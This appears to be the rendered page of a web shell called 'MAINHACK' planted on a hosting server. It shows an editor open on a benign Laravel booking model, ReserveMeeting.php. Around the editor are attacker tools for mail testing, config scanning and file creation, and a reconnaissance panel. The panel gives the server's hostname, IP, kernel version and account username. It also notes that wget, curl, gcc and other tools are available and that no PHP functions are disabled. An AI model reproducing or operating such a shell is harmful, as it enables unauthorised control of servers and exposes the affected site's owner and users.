[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ReserveMeeting.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; use Spatie\CalendarLinks\Link; class ReserveMeeting extends Model { protected $table = "reserve_meetings"; public static $open = "open"; public static $finished = "finished"; public static $pending = "pending"; public static $canceled = "canceled"; public $timestamps = false; protected $guarded = ['id']; public function meetingTime() { return $this->belongsTo('App\Models\MeetingTime', 'meeting_time_id', 'id'); } public function meeting() { return $this->belongsTo('App\Models\Meeting', 'meeting_id', 'id'); } public function sale() { return $this->belongsTo('App\Models\Sale', 'sale_id', 'id'); } public function user() { return $this->belongsTo('App\User', 'user_id', 'id'); } public function session() { return $this->hasOne('App\Models\Session', 'reserve_meeting_id', 'id'); } public function getDiscountPrice($user) { $price = $this->paid_amount; $totalDiscount = 0; if (!empty($this->discount)) { $totalDiscount += ($price * $this->discount) / 100; } if (!empty($user) and !empty($user->getUserGroup()) and isset($user->getUserGroup()->discount) and $user->getUserGroup()->discount > 0) { $totalDiscount += ($price * $user->getUserGroup()->discount) / 100; } return $totalDiscount; } public function addToCalendarLink() { $day = $this->day; $times = $this->meetingTime->time; if (!empty($day) and !empty($times)) { $day = str_replace('/', '-', $day); $times = explode('-', $times); $start_time = date("H:i", strtotime($times[0])); $end_time = date("H:i", strtotime($times[1])); $startDate = \DateTime::createFromFormat('Y-m-d H:i', $day . ' ' . $start_time); $endDate = \DateTime::createFromFormat('Y-m-d H:i', $day . ' ' . $end_time); $link = Link::create('Meeting', $startDate, $endDate); //->description('Cookies & cocktails!') return $link->google(); } return null; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.86 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285